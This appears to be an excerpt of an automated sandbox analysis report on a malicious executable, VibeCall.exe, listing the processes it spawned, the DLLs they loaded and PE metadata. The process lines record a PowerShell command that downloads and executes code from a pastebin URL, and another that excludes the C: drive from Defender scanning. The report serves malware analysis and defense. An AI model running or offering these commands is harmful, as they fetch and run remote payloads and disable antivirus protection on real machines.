                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7520 -s 652
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7520 -s 628
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\System32\fontdrvhost.exe	Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 2892 -s 136
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 8116 -s 252
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exe	Process created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe"
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2056 -s 480
                      Source: C:\Users\user\Desktop\VibeCall.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
                      Source: C:\Users\user\Desktop\VibeCall.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/ySSytGm5" -UseBasicParsing).Content"
                      Source: C:\Users\user\Desktop\VibeCall.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
                      Source: C:\Users\user\Desktop\VibeCall.exe	Process created: C:\Users\user\aisolution_vibecall_a.exe "C:\Users\user\aisolution_vibecall_a.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exe	Process created: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe "C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exe	Process created: C:\Users\user\Downloads\soundsolution_vibecall_c.exe "C:\Users\user\Downloads\soundsolution_vibecall_c.exe"
                      Source: C:\Users\user\Desktop\VibeCall.exe	Process created: C:\Users\user\Downloads\videosolution_vibecall_b.exe "C:\Users\user\Downloads\videosolution_vibecall_b.exe"
                      Source: C:\Users\user\aisolution_vibecall_a.exe	Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exe	Process created: C:\Windows\SysWOW64\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exe	Process created: C:\Windows\SysWOW64\OpenWith.exe "C:\Windows\system32\openwith.exe"
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\SysWOW64\fontdrvhost.exe	Process created: C:\Windows\System32\fontdrvhost.exe "C:\Windows\System32\fontdrvhost.exe"
                      Source: C:\Windows\SysWOW64\OpenWith.exe	Process created: unknown unknown
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: dwrite.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: icu.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: windowscodecs.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: textshaping.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: textinputframework.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: coreuicomponents.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: coremessaging.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: ntmarta.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: coremessaging.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: wbemcomn.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: amsi.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: userenv.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: profapi.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: iphlpapi.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: dhcpcsvc6.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: dhcpcsvc.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: dnsapi.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: winnsi.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: wldp.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: winhttp.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: mswsock.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: wshunix.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: winrnr.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: rasadhlp.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: nlaapi.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: wshbth.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: devobj.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: napinsp.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: pnrpnsp.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: fwpuclnt.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: secur32.dll
                      Source: C:\Users\user\Desktop\VibeCall.exe	Section loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Users\user\aisolution_vibecall_a.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\aisolution_vibecall_a.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\contry_solution_vibecall_e.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Downloads\soundsolution_vibecall_c.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Users\user\Downloads\videosolution_vibecall_b.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: powrprof.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: umpdc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\SysWOW64\fontdrvhost.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: amsi.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: userenv.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: profapi.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: version.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: wldp.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: sspicli.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: mpr.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: powrprof.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: umpdc.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\SysWOW64\OpenWith.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\Desktop\VibeCall.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                      Source: VibeCall.exeStatic PE information: certificate valid
                      Source: VibeCall.exeStatic PE information: Virtual size of .text is bigger than: 0x100000
                      Source: VibeCall.exeStatic PE information: Image base 0x140000000 > 0x60000000
                      Source: VibeCall.exeStatic file information: File size 71217328 > 1048576
                      Source: VibeCall.exeStatic PE information: Raw size of .text is bigger than: 0x100000 < 0x61ac00
                      Source: VibeCall.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0x17ca00
                      Source: VibeCall.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x172800
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                      Source: VibeCall.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                      Source: VibeCall.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: n=4.pDbZ source: powershell.exe, 0000000C.00000002.2279960715.000001A65A6A5000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: wkernel32.pdb source: aisolution_vibecall_a.exe, 0000000F.00000003.2616028388.00000000037B0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2616337623.00000000038D0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdb source: aisolution_vibecall_a.exe, 0000000F.00000003.2617234847.00000000039D0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2616935783.00000000037B0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdb source: aisolution_vibecall_a.exe, 0000000F.00000003.2614078670.00000000037B0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2614307760.00000000039A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdbUGP source: aisolution_vibecall_a.exe, 0000000F.00000003.2615457441.0000000003950000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2614813306.00000000037B0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 00000010.00000003.2662183332.0000000002960000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: ntdll.pdbUGP source: aisolution_vibecall_a.exe, 0000000F.00000003.2614078670.00000000037B0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2614307760.00000000039A0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wntdll.pdb source: aisolution_vibecall_a.exe, 0000000F.00000003.2615457441.0000000003950000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2614813306.00000000037B0000.00000004.00000001.00020000.00000000.sdmp, contry_solution_vibecall_e.exe, 00000010.00000003.2662183332.0000000002960000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\Corehost.Static\singlefilehost.pdb source: VibeCall.exe, 00000000.00000000.1744985265.00007FF689FED000.00000002.00000001.01000000.00000003.sdmp
                      Source: Binary string: wkernel32.pdbUGP source: aisolution_vibecall_a.exe, 0000000F.00000003.2616028388.00000000037B0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2616337623.00000000038D0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: wkernelbase.pdbUGP source: aisolution_vibecall_a.exe, 0000000F.00000003.2617234847.00000000039D0000.00000004.00000001.00020000.00000000.sdmp, aisolution_vibecall_a.exe, 0000000F.00000003.2616935783.00000000037B0000.00000004.00000001.00020000.00000000.sdmp
                      Source: Binary string: D:\a\_work\1\s\artifacts\obj\coreclr\windows.x64.Release\dlls\mscordac\mscordaccore.pdb source: VibeCall.exe, 00000000.00000000.1745566151.00007FF68A1F2000.00000002.00000001.01000000.00000003.sdmp
